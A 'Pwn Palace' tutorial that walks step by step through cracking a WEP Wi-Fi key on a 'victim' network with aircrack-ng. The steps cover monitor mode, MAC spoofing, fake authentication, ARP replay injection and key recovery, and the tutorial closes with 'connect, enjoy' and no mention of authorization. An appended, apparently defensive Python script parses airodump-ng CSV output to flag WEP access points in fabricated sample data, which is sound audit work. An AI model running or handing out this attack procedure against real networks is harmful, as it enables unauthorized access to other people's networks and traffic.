Pwn Palace

Cracking WEP

In this brief tutorial, I will give you the quick-n-easy on cracking a WEP network.

OS: Kali Linux

Applications: Airmon, Airodump, Aircrack, Macchanger

Note: Quotation marks are not to be added into the commands.

Requirements: Backtrack 5 OS or LiveCD, a working wireless card or antenna (used for injection and monitoring)

Step 1: Open a terminal window and type "airmon-ng". This will list all current network interface devices. Under most circumstances, your wireless card should appear as "wlan0".

Step 2: Type "airmon-ng start wlan0" (assuming wlan0 is your wireless interface). This command will put your wireless device into monitor mode, often loosely referred to as promiscuous mode. It will also change your device from wlan0 to mon0. mon0 is the interface that will be used through the remainder of this tutorial. Under normal circumstances, a wireless device may receive all frames on the air within the network, but will only process the frames addressed to that particular device. Monitor mode, as the name suggests, lets your card capture and process ALL frames coming its way, regardless of destination.

Step 3: Now we want to change the device's MAC address. Why? Unlike IPs, which can change with each connection, MAC addresses are "burned" into the device: it is a static number, which means it will never change unless we force it to.
Type "ifconfig mon0 down" to shut off the monitor interface.
Type "macchanger -m XX:XX:XX:XX:XX:XX mon0" (replacing the XX pairs with whatever you want for the address), then push enter. Keep in mind the MAC address must stay in the form "XX:XX:XX:XX:XX:XX", meaning six colon-separated pairs of hexadecimal digits (0-9 and A-F).
Type "ifconfig mon0 up" to bring the monitor interface back up.

Step 4: Type "airodump-ng mon0". This will bring up a list of local wireless networks (within range of your card). Since this is a WEP tutorial, choose a WEP network. When you find the one you want to crack, note its BSSID and channel, then press "ctrl+c" to stop the scan.

Step 5: You now want to choose where your captured data is saved.
Type "airodump-ng -c [channel of victim] -w [filename to save as] --bssid [bssid of victim] mon0".
Open a new shell, leaving this one running.

Step 6: You now want to do a fake authentication against the victim's access point to get it talking with yours.
Type "aireplay-ng -1 3 -a [bssid of victim] mon0" and wait for the authentication to succeed.
Leave this shell running and open a new shell.

Step 7: In the airodump-ng shell from Step 5 you'll see a column labelled "# DATA", which is the number of data packets captured from the victim's network. You can't start cracking the WEP key until that number reaches at least 5000. If that router isn't active, this may take a long time. Don't you wish you could fast-forward time? You can with an ARP injection, which will force that router to start talking. Think of it as the router being in an interrogation room, and you just flipped on the bright lights.

To perform the ARP injection, type "aireplay-ng -3 -b [bssid of victim] -h [your MAC address, i.e. the one you set in Step 3] mon0". This part usually takes a few minutes, but once it gets going you should see the numbers shown under "# DATA" start to fly.

Step 8: Once you've reached at least 5000, you can start cracking the key. Type "aircrack-ng [name of saved file]-01.cap". For example, if you saved the file as "johnny", the filename would be "johnny-01.cap". That's it! Leave all terminals running until you see "KEY FOUND". Cracked, connect, enjoy!
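The flip side of the procedure above is the defender's job: find out whether any of your own access points still run WEP before someone else does. The following script is an added example, not part of the original tutorial or of the aircrack-ng project. It assumes the standard layout of the "-01.csv" file that airodump-ng writes alongside the "-01.cap" capture when you pass "-w" (an AP table with a "# IV" column, a blank line, then a station table), flags every network whose Privacy field includes WEP, and marks those whose collected IV count already meets the 5000 figure the tutorial uses as the point at which aircrack-ng tends to succeed. The sample CSV is constructed for the example, with made-up BSSIDs and ESSIDs.

```python
import csv
import io
from dataclasses import dataclass
from typing import List, Tuple

# Rule of thumb from the tutorial: aircrack-ng usually needs ~5000 IVs for WEP.
IV_THRESHOLD = 5000

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# an AP table, a blank line, then a station table. Addresses and names are fake.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 12:00:00, 2024-01-01 12:09:00,  6,  54, WEP , WEP, OPN, -40,      120,     5321,   0.  0.  0.  0,   9, LegacyLab, 
AA:BB:CC:00:00:02, 2024-01-01 12:00:00, 2024-01-01 12:09:00, 11,  54, WPA2, CCMP, PSK, -55,      300,        0,   0.  0.  0.  0,   6, Office, 
AA:BB:CC:00:00:03, 2024-01-01 12:01:00, 2024-01-01 12:09:00,  1,  54, WEP , WEP, OPN, -70,       40,      812,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2024-01-01 12:00:00, 2024-01-01 12:09:00, -50,      900, AA:BB:CC:00:00:01,
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str   # e.g. "WEP", "WPA2", or "WPA2 WPA" for mixed mode
    cipher: str
    essid: str
    ivs: int       # the "# IV" column, i.e. unique WEP IVs seen so far


def parse_airodump_csv(text: str) -> List[AccessPoint]:
    """Parse only the AP table of an airodump-ng CSV file (stops at the blank
    line that separates it from the station table)."""
    aps: List[AccessPoint] = []
    in_ap_table = False
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or all(not cell.strip() for cell in row):
            if in_ap_table:
                break          # blank line closes the AP table
            continue           # leading blank line before the header
        if row[0].strip() == "BSSID":
            in_ap_table = True # header row: column order is fixed by airodump-ng
            continue
        if not in_ap_table:
            continue
        aps.append(AccessPoint(
            bssid=row[0].strip(),
            channel=int(row[3]),
            privacy=row[5].strip(),
            cipher=row[6].strip(),
            essid=row[13].strip(),
            ivs=int(row[10]),
        ))
    return aps


def find_wep_networks(aps: List[AccessPoint],
                      iv_threshold: int = IV_THRESHOLD) -> List[Tuple[AccessPoint, bool]]:
    """Return every AP advertising WEP, paired with True when the IV count
    already meets the threshold at which a key recovery is likely."""
    return [(ap, ap.ivs >= iv_threshold)
            for ap in aps if "WEP" in ap.privacy.split()]


def report(text: str) -> List[str]:
    """Human-readable audit lines, one per WEP network found."""
    lines = []
    for ap, at_risk in find_wep_networks(parse_airodump_csv(text)):
        status = "IVs already sufficient to crack" if at_risk else "IVs still below threshold"
        lines.append(f"{ap.bssid}  ch{ap.channel:<2} {ap.essid!r}: WEP ({ap.ivs} IVs) - {status}")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_CSV):
        print(line)
```

Run it against a real file with `report(open("johnny-01.csv").read())`; any line it prints is an access point that should be moved to WPA2/WPA3, since the tutorial shows that the only thing standing between a WEP network and its key is the traffic volume the "# IV" column is counting.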